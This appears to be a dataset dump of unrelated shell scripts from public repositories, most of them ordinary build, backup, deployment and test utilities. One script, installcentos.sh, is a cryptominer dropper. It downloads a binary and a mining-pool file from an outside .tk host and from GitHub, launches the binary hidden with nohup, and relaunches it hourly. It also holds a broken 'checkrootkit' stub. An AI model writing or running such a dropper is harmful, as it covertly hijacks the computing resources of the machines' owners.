source common
sudo mksquashfs ${CHROOT_PATH} ${ISO_BUILD_PATH}/${LIVE_PATH}/${SQFSNAME}.squashfs -comp xz
sudo du -sx --block-size=1 ${CHROOT_PATH} | cut -f1 > ${ISO_BUILD_PATH}/${LIVE_PATH}/${SQFSNAME}.size
chroot_do ${CHROOT_PATH} dpkg-query -W --showformat='${Package} ${Version}\n' \
> ${ISO_BUILD_PATH}/${LIVE_PATH}/${SQFSNAME}.manifest
| true
|
c6757b0dea004e0f9ea38be6c0f0832824a80df2
|
Shell
|
moul/kythe
|
/tools/git/test-affected-targets.sh
|
UTF-8
| 1,551
| 3.46875
| 3
|
[
"Apache-2.0",
"NCSA"
] |
permissive
|
#!/bin/bash
# Copyright 2021 The Kythe Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# A pre-commit hook which will determine and run affected test targets using the
# files passed on the command line.
# Usage: test-affected-targets.sh file...
set -e
OMIT_TAGS=(manual broken arc-ignore docker)
function join_by {
local d="$1"
shift
local f="$1"
shift
printf %s "$f" "${@/#/$d}";
}
TAG_RE="\\b($(join_by '|' "${OMIT_TAGS[@]}"))\\b"
readarray -t TARGETS < <(bazel query \
--keep_going \
--noshow_progress \
"let exclude = attr('tags', '$TAG_RE', //...) in rdeps(//... except \$exclude, set($*)) except \$exclude")
if [[ "${#TARGETS[@]}" -gt 0 ]]; then
echo "Building targets"
bazel build --config=prepush "${TARGETS[@]}"
fi
readarray -t TESTS < <(bazel query \
--keep_going \
--noshow_progress \
"let expr = tests(set(${TARGETS[*]})) in \$expr except attr('tags', '$TAG_RE', \$expr)")
if [[ "${#TESTS[@]}" -gt 0 ]]; then
echo "Running tests"
bazel test --config=prepush "${TESTS[@]}"
fi
| true
|
d74788f8de3c062a4da1712ff7e9963ad8f5545d
|
Shell
|
konstl000/pcf-spring-music-code
|
/scripts/build.sh
|
UTF-8
| 170
| 3.046875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
set -e -x
if [ "$#" -ne 1 ]; then
echo "Please provide location to place build output."
exit 1;
fi
./gradlew build
cp build/libs/spring-music.war $1
| true
|
531b1ea3b2c35c308d669ed5d4e1c9f3775c03ae
|
Shell
|
xamindar/rotate-backups
|
/backup-minecraft.sh
|
UTF-8
| 1,061
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# wipe any stale screens
#sudo -u minecraft screen -wipe
# First, check if the server is even running. If not, then do nothing and exit.
if screen -ls minecraft/ | grep 'Private\|Attached\|Detached'; then
echo server active, backing up
# save the world
sudo -u minecraft screen -X stuff "say Preparing for server snapshot, world saving disabled. $(printf '\r')"
sudo -u minecraft screen -X stuff "save-all $(printf '\r')"
# turn off seever saving
sudo -u minecraft screen -X stuff "save-off $(printf '\r')"
if ! mountpoint -q /mnt/btrfs ;then
echo "btrfs root not mounted, mounting"
mount /mnt/btrfs
fi
# create new snapshot of minecraft directory
sleep 5 # just in case
btrfs subvolume snapshot -r /srv/minecraft /mnt/btrfs/backups/minecraft_backup_`date +%F-%H%M%S`
#umount /mnt/btrfs
# turn server saving back on
sudo -u minecraft screen -X stuff "save-on $(printf '\r')"
sudo -u minecraft screen -X stuff "say Server snapshot complete, world saving enabled. $(printf '\r')"
else
echo no active server, exiting
exit
fi
| true
|
582542e9e3e2446a662812dece939f3b629654cb
|
Shell
|
tsutsu/workspace
|
/setup-30-create-user.sh
|
UTF-8
| 189
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
export TERM=xterm
useradd -M -N -g "$(grep -e "^staff:" /etc/group | cut -d':' -f 3)" -s /bin/bash tsutsu
mv /tmp/skel /home/tsutsu
chown -R tsutsu:staff /home/tsutsu
| true
|
4dad96b755f55adc35e83fd9df3a1be04cdb2d14
|
Shell
|
camview16/spawn_RDS_writer
|
/check_RDS_metric_status
|
UTF-8
| 1,158
| 3.953125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Fetch flag value to check the Cloudwatch ALARM trigger, 1=Run, 0=stop
SPAWN_RDS_FLAG=$(cat $PWD/spawn_RDS_config | awk '{split($0,array,"=")} END{print array[2]}')
if [ $SPAWN_RDS_FLAG -eq 1 ]
then
live_rds_high_cpu_metric=XXXX
test_rds_high_cpu_metric=XXXX
# LIVE = 1
# TEST = 2
env=2
profile_name=AAAA
if [ $env -eq 2 ]
then
echo "TEST config set"
db_instance_metric_name=$test_rds_high_cpu_metric
elif [ $env -eq 1 ]
then
echo "LIVE config set"
db_instance_metric_name=$live_rds_high_cpu_metric
fi
# Check if CPU high metric is in ALARM or OK state to spawn the instance vertically
metric_status=$(/usr/local/bin/aws cloudwatch describe-alarms --alarm-names $db_instance_metric_name --profile $profile_name --query 'MetricAlarms[0].StateValue' --output text)
if [ "$metric_status" = "ALARM" ]
then
echo "NOT OK"
sed -i 's/SPAWN_RDS_FLAG=1/SPAWN_RDS_FLAG=0/g' $PWD/spawn_RDS_config
bash $PWD/spawn_RDS
elif [ "$metric_status" = "OK" ]
then
echo "ALL OK"
fi
else
echo "FLAG is NOT SET"
fi
| true
|
4ac98dfb94ff036c0cc62ca59bf45783cc4d6e4e
|
Shell
|
lucamartini/CMS
|
/AM/scripts/run_secs.sh
|
UTF-8
| 3,755
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# run bank generation 12 at time, 4 in a row --> 12 cpu needed
# input sets coverage (default sets 0.4 0.7 0.7)
cd ../CMSSW_6_1_2_SLHC6_patch1/src/amsimulation
# configurations
SS=32
DC=0
COV=0.5
if [ "$#" = 1 ]
then
COV=$1
fi
FK=0
SEC=0
ActiveLayers="5 6 7 8 9 10"
# input tracks
PTMIN=2
PTMAX=100
PTstring=low2
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_hig/
BANKNAME=612_SLHC6_MUBANK_hig_sec16_ss32_cov40_dc0_fk0.pbk
I=0
for SEC in 0 8 16
do
for DC in 2 3
do
for SS in 32 64
do
fullnohup=""
J=0
# for PT in 2 3 5 20
# for PT in 2 3
for PT in 5 20
do
PTMIN=2
if [ "$PT" = 2 ]
then
if [ "$#" = 0 ]
then
COV=0.4
fi
PTMIN=2
PTMAX=5
PTstring=low2
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_low/
fi
if [ "$PT" = 3 ]
then
if [ "$#" = 0 ]
then
COV=0.4
fi
PTMIN=3
PTMAX=5
PTstring=low3
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_low/
fi
if [ "$PT" = 5 ]
then
if [ "$#" = 0 ]
then
COV=0.7
fi
PTMIN=5
PTMAX=20
PTstring=mid
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_mid/
fi
if [ "$PT" = 20 ]
then
if [ "$#" = 0 ]
then
COV=0.7
fi
PTMIN=20
PTMAX=100
PTstring=hig
INPUTDIR=/gpfs/ddn/srm/cms/store/user/lmartini/AM/612_SLHC6_MUBANK_hig/
fi
if [ "$SEC" = 0 ]
then
FK=1
ActiveLayers="5 6 18 19 20 21 22"
fi
if [ "$SEC" = 8 ]
then
FK=2
ActiveLayers="5 6 7 8 9 10 18 19"
fi
if [ "$SEC" = 16 ]
then
FK=0
ActiveLayers="5 6 7 8 9 10"
fi
((I++))
((J++))
INFOSTRING=PT_${PTstring}_sec${SEC}_ss${SS}_cov${COV}_dc${DC}_fk${FK}
BANKNAME=612_SLHC6_MUBANK_${INFOSTRING}.pbk
# echo ./AMSimulation --generateBank --coverage=${COV} --ss_size=${SS} --dc_bits=${DC} --pt_min=${PTMIN} --pt_max=${PTMAX} --maxFakeSStrip=${FK} --input_directory=${INPUTDIR} --sector_id=${SEC} --bank_name=${BANKNAME} --active_layers=\"${ActiveLayers}\"
# ./AMSimulation --generateBank --coverage=${COV} --ss_size=${SS} --dc_bits=${DC} --pt_min=${PTMIN} --pt_max=${PTMAX} --maxFakeSStrip=${FK} --input_directory=${INPUTDIR} --sector_id=${SEC} --bank_name=${BANKNAME} --active_layers=\"${ActiveLayers}\" > ${INFOSTRING}.txt &
fullnohup+="nohup ./AMSimulation --generateBank --coverage=${COV} --ss_size=${SS} --dc_bits=${DC} --pt_min=${PTMIN} --pt_max=${PTMAX} --maxFakeSStrip=${FK} --input_directory=${INPUTDIR} --sector_id=${SEC} --bank_name=${BANKNAME} --active_layers=\"${ActiveLayers}\" > ${INFOSTRING}.txt"
if [ $J -lt 2 ] # 4
then
fullnohup+=" && "
else
fullnohup+=" & "
fi
done
echo ${fullnohup}
eval ${fullnohup}
done
done
done
echo jobs are $I
| true
|
0d19bbadad2f3f9d58a1799514b8ecedceaf5bbf
|
Shell
|
bioconda/bioconda-recipes
|
/recipes/connectome-workbench/build.sh
|
UTF-8
| 523
| 2.578125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
export PKG_CONFIG_PATH=${PREFIX}/lib/pkgconfig \
OPENMP_HEADER_DIR=${PREFIX}/include \
OPENMP_LIB_DIR=${PREFIX}/lib \
FREETYPE_DIR=${PREFIX}
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=${PREFIX} -DOPENSSL_ROOT_DIR=${PREFIX} \
-DCMAKE_BUILD_TYPE=Release -DCMAKE_EXE_LINKER_FLAGS_RELEASE="-L${PREFIX}/lib" \
-DWORKBENCH_USE_QT5=TRUE -DZLIB_ROOT=${PREFIX} -DWORKBENCH_MESA_DIR=${PREFIX} \
-DCMAKE_PREFIX_PATH=${PREFIX} -DPKG_CONFIG_USE_CMAKE_PREFIX_PATH=True ../src
make -j ${CPU_COUNT}
make install
| true
|
5911d96dd6fbb0636da8234e33cb1cee0ea5cc34
|
Shell
|
vibolyoeung/web-environment-script
|
/install-webenv.sh
|
UTF-8
| 655
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
STAMP="/etc/apache2/.environment"
if [ ! -f $STAMP ]; then
export DEBIAN_FRONTEND="noninteractive" ; set -e -x
APT="apt-get -y -o DPkg::Options::=--force-confdef -o DPkg::Options::=--force-confold -o APT::Get::force-yes=true"
#Avoid a few common cases of dependency version drift
sudo $APT update
#Install apache
sudo $APT install apache2
#Install mysql
sudo $APT install mysql-server libapache2-mod-auth-mysql php5-mysql
sudo mysql_install_db
sudo /usr/bin/mysql_secure_installation
sudo $APT install php5 php5-mysql libapache2-mod-php5
apt-cache search php5-
sudo service apache2 restart
sudo touch $STAMP
fi
| true
|
46207b33ef5cd1b5547a4e8c8f18d2bda782af5d
|
Shell
|
nmutsanas/dotfiles
|
/bin/i3/restore-screen-settings.sh
|
UTF-8
| 169
| 2.703125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/zsh
function restore_screen_settings(){
if [[ -f $HOME/.screenlayout/restore.sh ]]; then
zsh $HOME/.screenlayout/restore.sh
fi
}
restore_screen_settings "$@"
| true
|
b3480a276fcf5b1cbfca258e5a3734ce3492c56e
|
Shell
|
ocawley/ittsqa09
|
/x00012086_v2Bash.sh
|
UTF-8
| 1,233
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
passcount=0
failcount=0
TEST=$(java grades_v2 50 50)
if [ "$TEST" == "Pass" ];
then
echo Testcase 1 Passed
((passcount++))
else
echo TestCase 1 Failed
((failcount++))
fi
echo
TEST=$(java grades_v2 40 70)
if [ "$TEST" == "Pass" ];
then
echo Testcase 2 Passed
((passcount++))
else
echo TestCase 2 Failed
((failcount++))
fi
echo
TEST=$(java grades_v2 100 39)
if [ "$TEST" == "Component Fail" ];
then
echo Testcase 3 Passed
((passcount++))
else
echo TestCase 3 Failed
((failcount++))
fi
echo
TEST=$(java grades_v2 80 50)
if [ "$TEST" == "Pass" ];
then
echo Testcase 4 Passed
((passcount++))
else
echo TestCase 4 Failed
((failcount++))
fi
echo
TEST=$(java grades_v2 79 84)
if [ "$TEST" == "Pass with distinction" ];
then
echo Testcase 5 Passed
((passcount++))
else
echo TestCase 5 Failed
((failcount++))
fi
echo
TEST=$(java grades_v2 -12 100)
if [ "$TEST" == "Invalid input" ];
then
echo Testcase 6 Passed
((passcount++))
else
echo TestCase 6 Failed
((failcount++))
fi
echo
echo ------------------------
echo ------------------------
echo Test Suite Summary:
echo ------------------------
echo ------------------------
echo Passed: $passcount
echo Failed: $failcount
| true
|
4d37c818775ab332a7d5b2852c84bc24bef88b98
|
Shell
|
kura197/RISCV_pipeline_processor
|
/test.sh
|
UTF-8
| 664
| 3.59375
| 4
|
[] |
no_license
|
#/bin/sh
## TEST_DIR : path to the riscv-tests directory
ISA_DIR=$TEST_DIR/isa
SIM=./obj_dir/vtest
NTESTS=0
NFAIL=0
### test failed if printed.
for file in `find $ISA_DIR -maxdepth 1 -type f`; do
if [ -x ""$file -a `echo $file | grep -- "rv32ui-p-"` ]; then
NTESTS=$(($NTESTS + 1))
#output="test $file .. "
result=`$SIM $file 2> /dev/null`
#echo $result
`echo $result | grep -q "a0 : 00000000, a7 : 0000005d"`
if [ $? -ne 0 ]; then
NFAIL=$(($NFAIL + 1))
echo $file
fi
fi
done
NCORRECT=$(($NTESTS - $NFAIL))
echo "ran $NTESTS test cases. $NCORRECT passed. $NFAIL failed."
| true
|
727253ff225aa5efc9b08a720ddbd5d62e4d2e17
|
Shell
|
afine/sqoop2-tools
|
/csd/src/scripts/control.sh
|
UTF-8
| 5,093
| 3.40625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# for debugging
set -x
# For better debugging
echo ""
echo "Date: `date`"
echo "Host: `hostname -f`"
echo "Pwd: `pwd`"
echo "SQOOP_SERVER_EXTRA_LIB: $SQOOP_SERVER_EXTRA_LIB"
echo "CM_SQOOP_DATABASE_HOSTNAME: $CM_SQOOP_DATABASE_HOSTNAME"
echo "CONF_DIR: $CONF_DIR"
echo "AUTHENTICATION_TYPE: $AUTHENTICATION_TYPE"
echo "Entire environment:"
env
# If we're starting the server, the variable "COMMAND" will be empty and instead $1 will be "server"
if [[ -z "$COMMAND" ]]; then
export COMMAND=$1
fi
# Defining variables expected in Sqoop 2 scripts
export HADOOP_COMMON_HOME=$CDH_HADOOP_HOME
export HADOOP_HDFS_HOME=$CDH_HDFS_HOME
export HADOOP_YARN_HOME=$CDH_YARN_HOME
export HADOOP_MAPRED_HOME=$CDH_MR2_HOME
export SQOOP_CONF_DIR=$CONF_DIR
# We also need to create small oustanding file that will instruct Sqoop to use the file configuration provider
echo "sqoop.config.provider=org.apache.sqoop.core.PropertiesConfigurationProvider" > $SQOOP_CONF_DIR/sqoop_bootstrap.properties
# We need to finish Sqoop 2 configuration file sqoop.properties as CM is not generating final configuration
export CONF_FILE=$SQOOP_CONF_DIR/sqoop.properties
# JDBC Repository provider post-configuration
case $CM_SQOOP_DATABASE_TYPE in
MySQL)
export DB_HANDLER="org.apache.sqoop.repository.mysql.MySqlRepositoryHandler"
export DB_JDBC_PREFIX="jdbc:mysql://"
export DB_DRIVER="com.mysql.jdbc.Driver"
;;
PostgreSQL)
export DB_HANDLER="org.apache.sqoop.repository.postgresql.PostgresqlRepositoryHandler"
export DB_JDBC_PREFIX="jdbc:postgresql://"
export DB_DRIVER="org.postgresql.Driver"
;;
Derby)
export DB_HANDLER="org.apache.sqoop.repository.derby.DerbyRepositoryHandler"
export DB_JDBC_PREFIX="jdbc:derby:"
export DB_DRIVER="org.apache.derby.jdbc.EmbeddedDriver"
;;
*)
echo "Unknown Database type: '$CM_SQOOP_DATABASE_TYPE'"
exit 1
;;
esac
echo "org.apache.sqoop.repository.jdbc.handler=$DB_HANDLER" >> $CONF_FILE
echo "org.apache.sqoop.repository.jdbc.url=${DB_JDBC_PREFIX}${CM_SQOOP_DATABASE_HOSTNAME}" >> $CONF_FILE
echo "org.apache.sqoop.repository.jdbc.driver=${DB_DRIVER}" >> $CONF_FILE
# Hadoop configuration directory depends on where we're running from:
echo "org.apache.sqoop.submission.engine.mapreduce.configuration.directory=$CONF_DIR/yarn-conf/" >> $CONF_FILE
# Authentication handler
case $AUTHENTICATION_TYPE in
SIMPLE)
echo "org.apache.sqoop.security.authentication.handler=org.apache.sqoop.security.authentication.SimpleAuthenticationHandler" >> $CONF_FILE
;;
KERBEROS)
echo "org.apache.sqoop.security.authentication.handler=org.apache.sqoop.security.authentication.KerberosAuthenticationHandler" >> $CONF_FILE
;;
*)
echo "Unknown authention type: '$AUTHENTICATION_TYPE'"
exit 1
;;
esac
# If we have kerberos principal, then add corresponding entries to the configuration
if [[ -f "$CONF_DIR/sqoop2_beta.keytab" ]]; then
echo "Detected keytab file, configuring Sqoop to use it"
echo "org.apache.sqoop.security.authentication.kerberos.keytab=$CONF_DIR/sqoop2_beta.keytab" >> $CONF_FILE
echo "org.apache.sqoop.security.authentication.kerberos.http.keytab=$CONF_DIR/sqoop2_beta.keytab" >> $CONF_FILE
fi
# SSL/TLS configuration
echo "org.apache.sqoop.security.tls.enabled=$SSL_ENABLED" >> $CONF_FILE
echo "org.apache.sqoop.security.tls.protocol=$TLS_PROTOCOL" >> $CONF_FILE
# The parcel exports variable SQOOP2_DEFAULT_CONNECTOR_BLACKLIST containing default list of blacklisted connectors
# If user did not explicitly specify their own blacklist in safety valve, we will go ahead and use it.
if grep -q "org.apache.sqoop.connector.blacklist" $CONF_FILE; then
echo "Found existing blacklist configuration, skipping parcel default."
else
echo "Using parcel's default connector blacklist: $SQOOP2_DEFAULT_CONNECTOR_BLACKLIST"
echo "org.apache.sqoop.connector.blacklist=$SQOOP2_DEFAULT_CONNECTOR_BLACKLIST" >> $CONF_FILE
fi
# Execute required action(s)
case $COMMAND in
upgrade)
echo "Starting Sqoop 2 upgrade tool"
exec $SQOOP2_PARCEL_DIRNAME/bin/sqoop.sh tool upgrade
;;
key_rotation)
echo "Starting Sqoop 2 upgrade tool"
exec $SQOOP2_PARCEL_DIRNAME/bin/sqoop.sh tool repositoryencryption -FuseConf -TuseConf
;;
server)
export JAVA_OPTS="-Dlog4j.configuration=file:$SQOOP_CONF_DIR/log4j.properties -Dlog4j.debug"
echo "Starting Sqoop 2 from: $SQOOP2_PARCEL_DIRNAME"
exec $SQOOP2_PARCEL_DIRNAME/bin/sqoop.sh server run
;;
*)
echo "Unknown command: $COMMAND"
exit 1
;;
esac
| true
|
ffb1125b635fae166b840cc8717baea28a464b98
|
Shell
|
kengokimura/Procedure-of-creating-swarm-sample-in-chapter4
|
/swarm-config/2.init-swarm.sh
|
UTF-8
| 1,774
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
usage_exit() {
echo "Usage: $0 [-i|-s]"
exit 1
}
TOKEN=
FALG=false
while getopts is option
do
case $option in
i)
echo '-i option. Initializing the swarm and join worker nodes...'
echo "## docker container exec -it manager docker swarm init"
docker container exec -it manager docker swarm init
echo " please input the manager's TOKEN.(To get the token specify -s option before you use -i option.)"
read TOKEN
echo "## docker container exec -it worker01 docker swarm join --token $TOKEN manager:2377"
docker container exec -it worker01 docker swarm join --token $TOKEN manager:2377
echo "## docker container exec -it worker02 docker swarm join --token $TOKEN manager:2377"
docker container exec -it worker02 docker swarm join --token $TOKEN manager:2377
echo "## docker container exec -it worker03 docker swarm join --token $TOKEN manager:2377"
docker container exec -it worker03 docker swarm join --token $TOKEN manager:2377
echo "## docker container exec -it manager docker stack deploy -c /stack/visualizer.yml visualizer"
docker container exec -it manager docker stack deploy -c /stack/visualizer.yml visualizer
FLAG=true;;
s)
echo '-s option. The token is as follows...'
echo "## docker container exec -it manager docker swarm join-token manager"
docker container exec -it manager docker swarm join-token manager
FLAG=true;;
\?)
usage_exit
;;
esac
done
if [ -z $FLAG ]; then
usage_exit
fi
echo
echo "checking if other options are spcefied..."
echo "## shift \`expr \"$OPTIND\" - 1\`"
shift `expr "$OPTIND" - 1`
if [ $# -ge 1 ]; then
echo 'other options are '"$@"''
else
echo 'no other options'
fi
| true
|
c416e7804f519bb0376378275c1a2beaf2af6dfd
|
Shell
|
fangwenqi/Openstack_mitaka
|
/roles/templates/glance.prerequisites.sh
|
UTF-8
| 1,064
| 3.078125
| 3
|
[] |
no_license
|
#!/usr/bin/bash
source admin-openrc
cmd_openstack=$(which openstack)
cmd_grep=$(which grep)
# Create the glance user
$cmd_openstack user list | $cmd_grep glance
if [ $? = 0 ]
then
echo "glance service already available"
else
openstack user create --domain default --password pramati123 glance
fi
# Add the admin role to the glance user and service project
openstack role add --project service --user glance admin
# Create the glance service entity
$cmd_openstack service list | $cmd_grep glance
if [ $? = 0 ]
then
echo "glance service already available"
else
openstack service create --name glance --description "OpenStack Image" image
fi
# Create the glance endpoints
$cmd_openstack endpoint list | $cmd_grep glance
if [ $? = 0 ]
then
echo "glance service already available"
else
openstack endpoint create --region RegionOne image public http://controller:9292
openstack endpoint create --region RegionOne image internal http://controller:9292
openstack endpoint create --region RegionOne image admin http://controller:9292
fi
| true
|
99c64a7f5088ead5aa4afebd8b32aef665e6a250
|
Shell
|
justtestjusttest/justtestjusttest.github.io
|
/installcentos.sh
|
UTF-8
| 1,739
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function clear() {
rm -rf /etc/conf/pools.txt
rm -rf /etc/conf/bashg
}
function downmine() {
if [ ! -f "/etc/conf/pools.txt" ]; then
wget -q http://cqmygysdssjtwmydtsgx.tk/pools.txt -P /etc/conf/ && chmod +x /etc/conf/pools.txt
rm -rf /etc/conf/pools.txt.*
fi
if [ ! -f "/etc/conf/pools.txt" ]; then
wget -q https://raw.githubusercontent.com/justtestjusttest/justtestjusttest.github.io/master/pools.txt -P /etc/conf/ && chmod +x /etc/conf/pools.txt
rm -rf /etc/conf/pools.txt.*
fi
if [ ! -f "/etc/conf/bashg" ]; then
wget -q http://cqmygysdssjtwmydtsgx.tk/bashg -P /etc/conf/ && chmod +x /etc/conf/bashg
rm -rf /etc/conf/bashg.*
fi
if [ ! -f "/etc/conf/bashg" ]; then
wget -q https://raw.githubusercontent.com/justtestjusttest/justtestjusttest.github.io/master/bashg -P /etc/conf/ && chmod +x /etc/conf/bashg
rm -rf /etc/conf/bashg.*
fi
}
function checkrootkit() {
if [ -f "/conf/rootkit/"]; then
}
function checkandrun() {
p=$(ps aux | grep bashg | grep -v grep | wc -l)
if [ ${p} -eq 1 ]; then
echo "bashg"
elif [ ${p} -eq 0 ];then
while [ ! (-f "/etc/conf/bashg" && -f "/etc/conf/pools.txt)" ]
do
downmine
done
nohup /etc/conf/bashg -C /etc/conf/pools.txt>/dev/null 2>&1 &
else
echo ""
fi
}
while [ 1 ]
do
checkandrun
sleep 3600
done
| true
|
05a8f947cb143c43e7921786da9e605adb726ce9
|
Shell
|
quade0/contrib
|
/plugins/vserver/vserver_jiffies
|
UTF-8
| 2,291
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Created by Jan Rękorajski <baggins@pld-linux.org> based on vserver_cpu_ plugin.
#
# Graph Vserver cumulative cpu usage stats
#
# Configuration variables
# vservers - specify the vservers to include in the graph (default: all)
#
# NOTE: If no configuration variable is set, the default will be used
#
# see vserver_resources for example uses of configuration files
VSERVERS="$vservers"
INFO=(`sed 's/.*:\t//' /proc/virtual/info 2>/dev/null || echo '<none>'`)
KCIN="$[ 16#${INFO[2]} ]";
# If this is 1, then VCI_SPACES is present in the kernel (new in 2.6.19)
if [ $[ (KCIN >> 10) & 1 ] -eq 1 ]
then
NAMELOC="nsproxy"
else
NAMELOC="cvirt"
fi
if [ -z "$VSERVERS" ] ; then
XIDS=`find /proc/virtual/* -type d -exec basename {} \;`
else
# it's really more performant to specify vservers by ids or by linking but not in the configuration-file by name
XIDS=""
for i in $VSERVERS ; do
if [ -d /proc/virtual/$i ] ; then
XIDS="${XIDS}${i} "
else
for j in `find /proc/virtual/* -type d -exec basename {} \;` ; do
if [ "$i" = "`cat /proc/virtual/$j/$NAMELOC |grep NodeName |cut -f2`" ] ; then
XIDS="${XIDS}${j} "
fi
done
fi
done
fi
if [ "$1" = "config" ]; then
echo 'graph_category vserver'
echo 'graph_args --base 1000'
echo 'graph_title Vserver cpu usage'
echo 'graph_vlabel jiffies used per ${graph_period}'
echo 'graph_info Shows jiffies used on each vserver.'
for i in $XIDS ; do
LABEL=`grep NodeName /proc/virtual/$i/$NAMELOC | cut -f2`
NAME=`echo $LABEL | tr '-' '_'`
echo "${NAME}_hold.label on hold for cpu on $LABEL"
echo "${NAME}_hold.info on hold for cpu on $LABEL."
echo "${NAME}_hold.type COUNTER"
echo "${NAME}_scpu.label system cpu usage for $LABEL"
echo "${NAME}_scpu.info system cpu usage for $LABEL."
echo "${NAME}_scpu.type COUNTER"
echo "${NAME}_ucpu.label user cpu usage for $LABEL"
echo "${NAME}_ucpu.info user cpu usage for $LABEL."
echo "${NAME}_ucpu.type COUNTER"
done
exit 0
fi
for i in $XIDS ; do
NAME=`grep NodeName /proc/virtual/$i/$NAMELOC | cut -f2 | tr '-' '_'`
awk -v name=$NAME -v u=0 -v s=0 -v h=0 '
/^cpu [0-9]+:/ { u+=$3; s+=$4; h+=$5}
END {
print name "_hold.value " h
print name "_scpu.value " s
print name "_ucpu.value " u
}' /proc/virtual/$i/sched
done
| true
|
ec690ba9214b73dc5fb76466478027967d31b57d
|
Shell
|
noomorph/github-user-rank-extension
|
/scripts/clean.sh
|
UTF-8
| 241
| 3.09375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash -xe
run_clean() {
case $1 in
dist)
rm -rf dist
mkdir dist
;;
safari)
rm -rf gur.safariextension
;;
*)
run_clean dist &
run_clean safari &
wait
esac
}
PATH=node_modules/.bin/:$PATH run_clean "$@"
| true
|
0205177b56a29f8fea9450ad7a4f4c7a4d4728f6
|
Shell
|
brstar96/ai_developers_day_2019
|
/3_inference/Session1/set_environment.sh
|
UTF-8
| 437
| 2.8125
| 3
|
[] |
no_license
|
# Build the dockerfile for the engironment
if [ ! -z $(docker images -q tensorrt_ssd:latest) ]; then
echo "Dockerfile has already been built"
else
echo "Building docker image"
docker build -f dockerfiles/Dockerfile --tag=tensorrt_ssd .
fi
# Start the docker container
echo "Starting docker container"
docker run --runtime=nvidia -it -p 8886:8886 -p 6006:6006 -v `pwd`:/workspace/tensorrt_ssd -w /workspace/tensorrt_ssd tensorrt_ssd
| true
|
cd1aa933447a5c9139486b47bee7f3db7839a012
|
Shell
|
andaok/python
|
/script/MangGuoV/DataHandle/ReAdjust/.svn/text-base/BatchProcess.sh.svn-base
|
UTF-8
| 1,343
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
###############################
RELDIR=`dirname $0`
ABSDIR=`cd $RELDIR;pwd`
PYTHON="/usr/bin/python"
###############################
ARGNUM=$#
###############################
function step1()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/CheckAndInit.py
else
exit 1
fi
}
function step2()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/HandleEndlist.py
else
exit 1
fi
}
function step3()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/HandleVidSet.py
else
exit 1
fi
}
function step4()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/HandleUidSet.py
else
exit 1
fi
}
function step5()
{
if [ $? -eq 0 ]; then
$PYTHON $ABSDIR/WriteData.py
else
exit 1
fi
}
###############################
case $ARGNUM in
0) STARTSTEP=1
;;
1) if [ $1 -le 5 ] 2>/dev/null ;then
STARTSTEP=$1
else
echo "Usage : `basename $0` STARTSTEP(LESS THAN OR EQUAL FIVE)"
exit 1
fi
;;
*) echo "Usage : `basename $0` STARTSTEP(LESS THAN OR EQUAL FIVE) "
exit 1
;;
esac
###############################
for ((i=$STARTSTEP;i<=5;i++))
do
step${i}
done
###############################
exit 0
| true
|
0937a2c273262e87d61e2f99daaafe405445d670
|
Shell
|
osarena/Ubuntu-Apps
|
/uCodecsPack/uCodecsPack
|
UTF-8
| 7,444
| 3.125
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
#______________________________________________________________________________________________________
#Name : uCodecsPack
#Licence: GPL3 (http://www.gnu.org/licenses/gpl.html), FFmepeg and Zenity have their receptive licence, please see their man page
#Author : Salih Emin (Based on the original code 'Envied Ubuntu Multimedia Installer 2.2' http://gnome-look.org/content/show.php/Envied+Multimedia+GUI+Installer?content=129011)
#Email : salihemin (at) osarenat.net
#Date : 18-10-2011
#Version: Alpha 1.0
#System : Ubuntu (10.04 and above)
#WebSite: http://www.cerebrux.net - http://www.osarena.net/author/salih-emin
#Source Code: Everything below comments is the sourcecode :)
#Description:
#Codecs installer for ubuntu
#-Java Support
#-Flash Player Plugin
#-Gstreamer Codecs
#-w32codecs/w64codecs(ανάλογα με την αρχητεκτονική)
#-Non-free extra codecs
#-ffmpeg
#-Vlc media player
#-libdvdcss2 DVD codecs
#______________________________________________________________________________________________________
#
zenity --info --width=400 --title='uCodecsPack Ubuntu Multimedia Installer' \
